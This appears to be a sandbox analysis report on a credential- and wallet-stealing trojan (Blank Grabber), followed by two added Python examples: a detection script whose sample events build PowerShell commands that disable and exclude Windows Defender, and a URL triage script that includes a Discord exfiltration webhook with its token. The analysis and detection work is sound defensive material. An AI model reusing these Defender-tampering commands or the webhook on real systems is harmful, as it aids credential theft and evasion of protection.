              Source: VSSADMIN.EXE.exe, 00000001.00000003.192120671.0000014C6CCB7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Ethereum
              Source: VSSADMIN.EXE.exe, 00000001.00000003.192120671.0000014C6CCB7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Local Storage\leveldb\000003.log
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\21e53dbb-a709-4aa9-8d37-2ac6403c74f8
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: Yara match File source: 00000001.00000002.244794206.0000014C6CDB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: Process Memory Space: VSSADMIN.EXE.exe PID: 6872, type: MEMORYSTR

              Remote Access Functionality

              Source: Yara match File source: 00000000.00000003.188703701.0000024133485000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000000.00000003.246634028.0000024133487000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000001.00000003.244345388.0000014C6D074000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000000.00000003.188703701.0000024133487000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000001.00000003.244090909.0000014C6DD8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000001.00000003.192120671.0000014C6CCB7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000001.00000003.244259837.0000014C6D074000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000001.00000003.244317157.0000014C6CDAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000001.00000002.244794206.0000014C6CDB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000001.00000002.244872297.0000014C6D074000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: Process Memory Space: VSSADMIN.EXE.exe PID: 6856, type: MEMORYSTR
              Source: Yara match File source: Process Memory Space: VSSADMIN.EXE.exe PID: 6872, type: MEMORYSTR
              Source: Yara match File source: C:\Users\user\AppData\Local\Temp\_MEI68562\rarreg.key, type: DROPPED
              Source: C:\Users\user\Desktop\VSSADMIN.EXE.exe Code function: 1_2_00007FFD3FBF2B62 bind,WSAGetLastError,1_2_00007FFD3FBF2B62
              MITRE ATT&CK Matrix (one row per line; cells separated by "|"; a leading number is the signature hit count shown before the technique name; an empty cell means no technique in that column for that row)

              Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
              Valid Accounts | 11 Windows Management Instrumentation | 11 DLL Side-Loading | 11 DLL Side-Loading | 1 File and Directory Permissions Modification | 1 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 1 Ingress Tool Transfer | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | 1 Data Encrypted for Impact
              Default Accounts | 1 Native API | 12 Registry Run Keys / Startup Folder | 1 Access Token Manipulation | 3 Disable or Modify Tools | LSASS Memory | 2 File and Directory Discovery | Remote Desktop Protocol | 2 Data from Local System | Exfiltration Over Bluetooth | 21 Encrypted Channel | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | 1 System Shutdown/Reboot
              Domain Accounts | 212 Command and Scripting Interpreter | Logon Script (Windows) | 11 Process Injection | 11 Deobfuscate/Decode Files or Information | Security Account Manager | 36 System Information Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 3 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
              Local Accounts | 3 PowerShell | Logon Script (Mac) | 12 Registry Run Keys / Startup Folder | 21 Obfuscated Files or Information | NTDS | 141 Security Software Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 4 Application Layer Protocol | SIM Card Swap |  | Carrier Billing Fraud
              Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 11 Software Packing | LSA Secrets | 2 Process Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication |  | Manipulate App Store Rankings or Ratings
              Replication Through Removable Media | Launchd | Rc.common | Rc.common | 11 DLL Side-Loading | Cached Domain Credentials | 41 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service |  | Abuse Accessibility Features
              External Remote Services | Scheduled Task | Startup Items | Startup Items | 1 Masquerading | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points |  | Data Encrypted for Impact
              Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | 1 Modify Registry | Proc Filesystem | 1 Remote System Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols |  | Generate Fraudulent Advertising Revenue
              Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | 41 Virtualization/Sandbox Evasion | /etc/passwd and /etc/shadow | 1 System Network Configuration Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station |  | Data Destruction
              Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | 1 Access Token Manipulation | Network Sniffing | Process Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols |  |  | Data Encrypted for Impact
              Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | 11 Process Injection | Input Capture | Permission Groups Discovery | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols |  |  | Service Stop
              Behavior Graph ID: 1309234 | Sample: VSSADMIN.EXE.exe | Startdate: 15/09/2023 | Architecture: WINDOWS | Score: 100
              (Flattened from the graph widget. Bracketed numbers are the graph's own node numbers; a digit that follows a process name is the created registry value / file count badge as rendered on that node.)

              [2] start
                  DNS: tse1.mm.bing.net
                  Signatures: Found malware configuration; Antivirus detection for URL or domain; Multi AV Scanner detection for dropped file; 3 other signatures
                  Starts: [11] VSSADMIN.EXE.exe 22

              [11] VSSADMIN.EXE.exe
                  Dropped: C:\Users\user\AppData\...\unicodedata.pyd (PE32+); C:\Users\user\AppData\Local\...\sqlite3.dll (PE32+); C:\Users\user\AppData\Local\...\select.pyd (PE32+); 16 other malicious files
                  Signatures: Very long command line found; May check the online IP address of the machine; Drops PE files with a suspicious file extension; 5 other signatures
                  Starts: [15] VSSADMIN.EXE.exe 1 54

              [15] VSSADMIN.EXE.exe
                  Network: discord.com 162.159.138.232:443 (local port 49718; CLOUDFLARENETUS, United States); ip-api.com 208.95.112.1:80 (local ports 49715, 49717; TUT-ASUS, United States); blank-2md3e.in (DNS)
                  Dropped: C:\ProgramData\Microsoft\Windows\...\???.scr (PE32+); C:\Windows\System32\drivers\etc\hosts (ASCII); C:\Users\user\AppData\...\WUTJSCBCFX.png (ASCII); 2 other malicious files
                  Signatures: Very long command line found; Found many strings related to Crypto-Wallets (likely being stolen); Tries to harvest and steal browser information (history, passwords, etc); 5 other signatures
                  Starts: [20] cmd.exe 1; [23] cmd.exe; [25] cmd.exe 1; [27] 21 other processes

              [20] cmd.exe
                  Signatures: Suspicious powershell command line found; Very long command line found; Uses cmd line tools excessively to alter registry or file data; Bypasses PowerShell execution policy
                  Starts: [43] 2 other processes

              [23] cmd.exe
                  Signatures: Encrypted powershell cmdline option found
                  Starts: [29] powershell.exe; [32] conhost.exe

              [25] cmd.exe
                  Signatures: Modifies Windows Defender protection settings; Removes signatures from Windows Defender
                  Starts: [34] powershell.exe 19; [45] 2 other processes

              [27] 21 other processes
                  Signatures: Adds a directory exclusion to Windows Defender
                  Starts: [37] WMIC.exe 1; [39] WMIC.exe; [41] WMIC.exe; [47] 39 other processes

              [29] powershell.exe
                  Dropped: C:\Users\user\AppData\...\ozweafg0.cmdline (Unicode)
                  Starts: [50] csc.exe

              [34] powershell.exe
                  Signatures: Potential dropper URLs found in powershell memory

              [37] WMIC.exe
                  Signatures: DLL side loading technique detected

              [47] 39 other processes
                  Network: 192.168.2.1 (unknown, unknown)

              [50] csc.exe
                  Dropped: C:\Users\user\AppData\Local\...\ozweafg0.dll (PE32)
                  Starts: [53] cvtres.exe
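Detection logic for the process and file behaviours the graph flags (PowerShell execution-policy bypass and encoded command lines, Defender exclusions and protection changes, signature removal, a PE dropped to the Startup folder, a write to the hosts file), run over Windows process-creation and file-write events. This is an added example, not part of the Joe Sandbox report and not code from the Blank Grabber project. The concrete command-line patterns it maps the report's signature names to (-ExecutionPolicy Bypass, -EncodedCommand, Add-MpPreference -ExclusionPath, Set-MpPreference -Disable*, MpCmdRun -RemoveDefinitions), the 4096-character "very long command line" threshold and the sample events (paths, the Update.scr file name, the WMIC query) are this example's own assumptions, not what the sandbox recorded.

```python
from __future__ import annotations

import base64
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    image: str          # full path of the created process
    parent_image: str   # full path of its parent
    command_line: str


@dataclass(frozen=True)
class FileEvent:
    image: str          # process that wrote the file
    path: str           # file that was written


# Command-line and path patterns assumed to correspond to the report's signature names.
EXEC_BYPASS = re.compile(r"-(?:ep|exec|executionpolicy)\s+bypass\b", re.I)
ENCODED_CMD = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
DEFENDER_EXCLUSION = re.compile(r"Add-MpPreference\b.*-Exclusion(?:Path|Process|Extension)\b", re.I)
DEFENDER_DISABLE = re.compile(r"Set-MpPreference\b.*-Disable\w+\s+(?:\$true|1)\b", re.I)
DEFINITIONS_REMOVED = re.compile(r"-RemoveDefinitions\b", re.I)
STARTUP_PE = re.compile(r"\\Start Menu\\Programs\\StartUp\\[^\\]+\.(?:scr|exe|pif|com)$", re.I)
HOSTS_FILE = re.compile(r"\\System32\\drivers\\etc\\hosts$", re.I)
LONG_CMDLINE = 4096  # assumed threshold for the report's "very long command line" signature


def decode_encoded_command(command_line: str) -> str | None:
    """Return the script behind -EncodedCommand (base64 of UTF-16LE text), or None."""
    m = ENCODED_CMD.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def check_process(ev: ProcessEvent) -> list[str]:
    """Names of the behaviours one process-creation event matches."""
    hits: list[str] = []
    image = ev.image.lower()
    text = ev.command_line
    if len(text) > LONG_CMDLINE:
        hits.append("very_long_command_line")
    if image.endswith(("\\powershell.exe", "\\pwsh.exe")):
        if EXEC_BYPASS.search(text):
            hits.append("powershell_execution_policy_bypass")
        decoded = decode_encoded_command(text)
        if decoded is not None:
            hits.append("powershell_encoded_command")
            text = f"{text} {decoded}"  # apply the remaining rules to the decoded body too
        if DEFENDER_EXCLUSION.search(text):
            hits.append("defender_exclusion_added")
        if DEFENDER_DISABLE.search(text):
            hits.append("defender_protection_modified")
    if image.endswith("\\mpcmdrun.exe") and DEFINITIONS_REMOVED.search(text):
        hits.append("defender_signatures_removed")
    return hits


def check_file(ev: FileEvent) -> list[str]:
    """Names of the behaviours one file-write event matches."""
    hits: list[str] = []
    if STARTUP_PE.search(ev.path):
        hits.append("pe_dropped_to_startup_folder")
    if HOSTS_FILE.search(ev.path):
        hits.append("hosts_file_modified")
    return hits


def triage(process_events, file_events) -> list[str]:
    """Distinct behaviours seen across a batch of events, sorted for stable reporting."""
    found: set[str] = set()
    for ev in process_events:
        found.update(check_process(ev))
    for ev in file_events:
        found.update(check_file(ev))
    return sorted(found)


# Constructed sample events mirroring the report's process chain (not sandbox output).
USER = r"C:\Users\user"
CMD = r"C:\Windows\System32\cmd.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE = rf"{USER}\Desktop\VSSADMIN.EXE.exe"


def encode_command(script: str) -> str:
    """Build an -EncodedCommand argument the way the attacker's launcher does."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


SAMPLE_PROCESS_EVENTS = [
    ProcessEvent(PS, CMD, "powershell.exe -ExecutionPolicy Bypass -NoProfile -EncodedCommand "
                 + encode_command(rf"Add-MpPreference -ExclusionPath '{USER}\AppData\Local\Temp'")),
    ProcessEvent(PS, CMD, 'powershell.exe -Command "Set-MpPreference -DisableRealtimeMonitoring $true"'),
    ProcessEvent(r"C:\Program Files\Windows Defender\MpCmdRun.exe", CMD,
                 r'"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All'),
    ProcessEvent(r"C:\Windows\System32\wbem\WMIC.exe", SAMPLE, "wmic os get Caption"),  # no rule fires
]
SAMPLE_FILE_EVENTS = [
    FileEvent(SAMPLE, r"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Update.scr"),
    FileEvent(SAMPLE, r"C:\Windows\System32\drivers\etc\hosts"),
    FileEvent(SAMPLE, rf"{USER}\AppData\Local\Temp\_MEI68562\python311.dll"),  # normal PyInstaller unpack
]

if __name__ == "__main__":
    for name in triage(SAMPLE_PROCESS_EVENTS, SAMPLE_FILE_EVENTS):
        print(name)
```

The decoded -EncodedCommand body is checked with the same rules as the visible command line, because in the chain above the Defender exclusion sits behind the encoding and the cmd.exe that launches it only shows the "Encrypted powershell cmdline option". Writes into a `_MEI*` directory are deliberately not flagged: every PyInstaller-built program produces them, and the .pyd and DLL drops in the graph are that unpacking rather than a behaviour worth alerting on by itself.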

              Source | Detection | Scanner | Label
              VSSADMIN.EXE.exe | 24% | ReversingLabs | Win64.Trojan.Generic

              Source | Detection | Scanner | Label
              C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ???.scr | 24% | ReversingLabs | Win64.Trojan.Generic
              C:\Users\user\AppData\Local\Temp\_MEI68562\VCRUNTIME140.dll | 0% | ReversingLabs |
              C:\Users\user\AppData\Local\Temp\_MEI68562\_bz2.pyd | 0% | ReversingLabs |
              C:\Users\user\AppData\Local\Temp\_MEI68562\_ctypes.pyd | 0% | ReversingLabs |
              C:\Users\user\AppData\Local\Temp\_MEI68562\_decimal.pyd | 0% | ReversingLabs |
              C:\Users\user\AppData\Local\Temp\_MEI68562\_hashlib.pyd | 0% | ReversingLabs |
              C:\Users\user\AppData\Local\Temp\_MEI68562\_lzma.pyd | 0% | ReversingLabs |
              C:\Users\user\AppData\Local\Temp\_MEI68562\_queue.pyd | 0% | ReversingLabs |
              C:\Users\user\AppData\Local\Temp\_MEI68562\_socket.pyd | 0% | ReversingLabs |
              C:\Users\user\AppData\Local\Temp\_MEI68562\_sqlite3.pyd | 0% | ReversingLabs |
              C:\Users\user\AppData\Local\Temp\_MEI68562\_ssl.pyd | 0% | ReversingLabs |
              C:\Users\user\AppData\Local\Temp\_MEI68562\libcrypto-1_1.dll | 0% | ReversingLabs |
              C:\Users\user\AppData\Local\Temp\_MEI68562\libffi-8.dll | 0% | ReversingLabs |
              C:\Users\user\AppData\Local\Temp\_MEI68562\libssl-1_1.dll | 0% | ReversingLabs |
              C:\Users\user\AppData\Local\Temp\_MEI68562\python311.dll | 0% | ReversingLabs |
              C:\Users\user\AppData\Local\Temp\_MEI68562\rar.exe | 0% | ReversingLabs |
              C:\Users\user\AppData\Local\Temp\_MEI68562\select.pyd | 0% | ReversingLabs |
              C:\Users\user\AppData\Local\Temp\_MEI68562\sqlite3.dll | 0% | ReversingLabs |
              C:\Users\user\AppData\Local\Temp\_MEI68562\unicodedata.pyd | 0% | ReversingLabs |
              No Antivirus matches
              No Antivirus matches
              Source | Detection | Scanner | Label
              http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s | 0% | Avira URL Cloud | safe
              http://www.microsoftDOWNLO~1JSOy.0 | 0% | Avira URL Cloud | safe
              http://cacerts.digi | 0% | Avira URL Cloud | safe
              https://api.anonfiles.com/upload | 0% | Avira URL Cloud | safe
              https://discord.com/api/v9/users/ | 0% | Avira URL Cloud | safe
              https://blank-2MD3E.in | 0% | Avira URL Cloud | safe
              https://go.micro | 0% | Avira URL Cloud | safe
              http://www.cl.cam.ac.uk/~mgk25/iso-time.html | 0% | Avira URL Cloud | safe
              https://contoso.com/Icon | 0% | Avira URL Cloud | safe
              http://pesterbdd.com/images/Pester.png | 100% | Avira URL Cloud | malware
              http://crl.globalT | 0% | Avira URL Cloud | safe
              http://crl.comodoca.p | 0% | Avira URL Cloud | safe
              http://crl.micro | 0% | Avira URL Cloud | safe
              https://api.anonfiles.com/uploadr | 0% | Avira URL Cloud | safe
              http://go.microsoft.c | 0% | Avira URL Cloud | safe
              http://go.microsoft.ctain | 0% | Avira URL Cloud | safe
              https://foss.heptapod.net/pypy/pypy/-/issues/3539 | 0% | Avira URL Cloud | safe
              https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.png | 0% | Avira URL Cloud | safe
              https://contoso.com/License | 0% | Avira URL Cloud | safe
              http://ocsp.sectigo.com0 | 0% | Avira URL Cloud | safe
              https://discord.com/api/webhooks/1125357329798418472/yWPfp1iKyx0rkQloEOr9Xk-aX81R6WKX-1QBrT7zz3erb7v9flhr6ifTFvcDhFyRvu2k | 0% | Avira URL Cloud | safe
              http://ocsp.thawte.com0 | 0% | Avira URL Cloud | safe
              https://sectigo.com/CPS0 | 0% | Avira URL Cloud | safe
              https://contoso.com/ | 0% | Avira URL Cloud | safe
              http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0# | 0% | Avira URL Cloud | safe
              https://discord.com/api/webhooks/1125357329798418472/yWPfp1iKyx0rkQloEOr9Xk-aX81R6WKX-1QBrT7zz3erb7v | 0% | Avira URL Cloud | safe
              https://raw.githubusercontent.com/Blank-c/Blank-Grabber/main/.github/workflows/image.pngz | 0% | Avira URL Cloud | safe
              https://dotnet.micr | 0% | Avira URL Cloud | safe
              http://www.microsoftESSAG~1.JSOy.0 | 0% | Avira URL Cloud | safe
              Name | IP | Active | Malicious | Antivirus Detection | Reputation
              discord.com | 162.159.138.232 | true | true | | unknown
              ip-api.com | 208.95.112.1 | true | false | | high
              blank-2md3e.in | unknown | unknown | false | | unknown
              tse1.mm.bing.net | unknown | unknown | false | | high
              Name | Malicious | Antivirus Detection | Reputation
              https://discord.com/api/webhooks/1125357329798418472/yWPfp1iKyx0rkQloEOr9Xk-aX81R6WKX-1QBrT7zz3erb7v9flhr6ifTFvcDhFyRvu2k | true | Avira URL Cloud: safe | unknown
              http://ip-api.com/json/?fields=225545 | false | | high
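Triage of the domains and URLs the report lists, as an added example that is not part of the Joe Sandbox report or of the Blank Grabber project: it sorts the memory-carved URLs into exfiltration endpoints, documentation and certificate references carried in by the bundled Python modules and by PowerShell itself, truncated fragments that are not actionable, and hosts that still need a human decision, and it defangs them for sharing. The indicator list is constructed from entries on this page; the rule sets (which hosts count as stealer exfiltration services, which are library noise) and the bucket names are this example's own assumptions. The pesterbdd.com entry is attributed to the Pester module that ships with Windows PowerShell, whose manifest names that image as its icon; it appears only in powershell.exe memory on this page.

```python
from __future__ import annotations

import re
from urllib.parse import urlsplit

# Indicator strings copied from the report's tables (a representative subset, constructed list).
REPORT_URLS = [
    "https://discord.com/api/webhooks/1125357329798418472/yWPfp1iKyx0rkQloEOr9Xk-aX81R6WKX-1QBrT7zz3erb7v9flhr6ifTFvcDhFyRvu2k",
    "https://cdn.discordapp.com/attachments/1125126396101021879/1152337129716842596/Blank-user.rar",
    "http://ip-api.com/json/?fields=225545",
    "https://api.anonfiles.com/upload",
    "https://api.gofile.io/getServer",
    "https://api.telegram.org/bot",
    "https://blank-2MD3E.in",
    "https://github.com/urllib3/urllib3/issues/2168",
    "https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64",
    "http://pesterbdd.com/images/Pester.png",
    "http://www.microsoftDOWNLO~1JSOy.0",
]

# Exfiltration / staging services used by stealers of this family: (label, host regex, path regex).
# Assumed rule set; rules are tried in order and the first match wins.
EXFIL_RULES = [
    ("discord_webhook", r"(?:^|\.)discord(?:app)?\.com$", r"^/api/webhooks/\d+/"),
    ("discord_cdn_payload", r"^cdn\.discordapp\.com$", r"\.(?:rar|zip|exe|7z)$"),
    ("geolocation_check", r"^ip-api\.com$", r""),
    ("anonymous_file_host", r"^api\.(?:anonfiles\.com|gofile\.io)$", r""),
    ("telegram_bot_api", r"^api\.telegram\.org$", r"^/bot"),
]

# Hosts referenced in docstrings, manifests and certificates of the bundled interpreter,
# its libraries and PowerShell modules; not exfiltration endpoints. Assumed allowlist.
LIBRARY_NOISE = re.compile(
    r"(?:^|\.)(?:github\.com|githubusercontent\.com|python\.org|ietf\.org|readthedocs\.io"
    r"|xmlsoap\.org|apache\.org|heptapod\.net|cl\.cam\.ac\.uk|phys\.uu\.nl|contoso\.com"
    r"|pesterbdd\.com|nuget\.org|duckduckgo\.com|google\.com|yahoo\.com|httpbin\.org"
    r"|microsoft\.com|sectigo\.com|digicert\.com|comodoca\.com|thawte\.com|globalsign\.com)$"
)

HOSTNAME = re.compile(r"^(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z]{2,}$")
WEBHOOK_PATH = re.compile(r"^/api/webhooks/(\d+)/")


def classify(url: str) -> str:
    """Bucket one URL taken from a sandbox URL or memory-strings table."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    if not HOSTNAME.match(host):
        # Carved out of memory mid-string (a path glued to a host, an invalid label): not actionable.
        return "truncated_fragment"
    for label, host_re, path_re in EXFIL_RULES:
        if re.search(host_re, host) and re.search(path_re, parts.path):
            return label
    if LIBRARY_NOISE.search(host):
        return "library_noise"
    return "needs_review"  # e.g. blank-2MD3E.in: resolved by the sample, purpose not shown


def defang(url: str) -> str:
    """Render a URL so it is neither clickable nor auto-linked when shared."""
    parts = urlsplit(url)
    host = (parts.hostname or parts.netloc).replace(".", "[.]")
    query = f"?{parts.query}" if parts.query else ""
    return f"{parts.scheme.replace('http', 'hxxp')}://{host}{parts.path}{query}"


def webhook_id(url: str) -> str | None:
    """The numeric webhook ID: the stable part to report or block, since the token can change."""
    m = WEBHOOK_PATH.match(urlsplit(url).path)
    return m.group(1) if m else None


def triage(urls: list[str]) -> dict[str, list[str]]:
    """Group defanged URLs by bucket; the exfiltration buckets are what goes on the block list."""
    buckets: dict[str, list[str]] = {}
    for url in urls:
        buckets.setdefault(classify(url), []).append(defang(url))
    return buckets


if __name__ == "__main__":
    for bucket, urls in sorted(triage(REPORT_URLS).items()):
        print(bucket)
        for entry in urls:
            print("   ", entry)
```

The point of the allowlist is that a PyInstaller-packed stealer carries the docstrings of urllib3, importlib and friends into memory, so most of the long memory-strings table is library noise; the few entries worth an analyst's time are the webhook, the CDN payload link, the geolocation check, the anonymous file hosts and the unexplained domain the sample resolved. A host such as crl.micro that happens to look like a valid name still lands in needs_review, which is where a human decides.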
              Name | Source | Malicious | Antivirus Detection | Reputation
              https://duckduckgo.com/chrome_newtab | VSSADMIN.EXE.exe, 00000001.00000002.245019718.0000014C6D154000.00000004.00000020.00020000.00000000.sdmp | false | | high
              https://github.com/Blank-c/BlankOBF | VSSADMIN.EXE.exe, 00000001.00000003.191981255.0000014C6CCB7000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.191835270.0000014C6CD0E000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.191900080.0000014C6D2C9000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000003.192066107.0000014C6CD05000.00000004.00000020.00020000.00000000.sdmp | false | | high
              https://duckduckgo.com/ac/?q= | VSSADMIN.EXE.exe, 00000001.00000002.245019718.0000014C6D154000.00000004.00000020.00020000.00000000.sdmp | false | | high
              https://api.telegram.org/bot | VSSADMIN.EXE.exe, 00000001.00000003.192120671.0000014C6CCB7000.00000004.00000020.00020000.00000000.sdmp, VSSADMIN.EXE.exe, 00000001.00000002.244794206.0000014C6CDB0000.00000004.00001000.00020000.00000000.sdmp | false | | high
              https://github.com/Blank-c/Blank-Grabberi | VSSADMIN.EXE.exe, 00000001.00000003.192120671.0000014C6CCB7000.00000004.00000020.00020000.00000000.sdmp | false | | high
              https://github.com/Blank-c/Blank-Grabberr | VSSADMIN.EXE.exe, 00000001.00000003.192120671.0000014C6CCB7000.00000004.00000020.00020000.00000000.sdmp | false | | high
              https://github.com/urllib3/urllib3/issues/2168 | VSSADMIN.EXE.exe, 00000001.00000003.192576009.0000014C6CC6C000.00000004.00000020.00020000.00000000.sdmp | false | | high
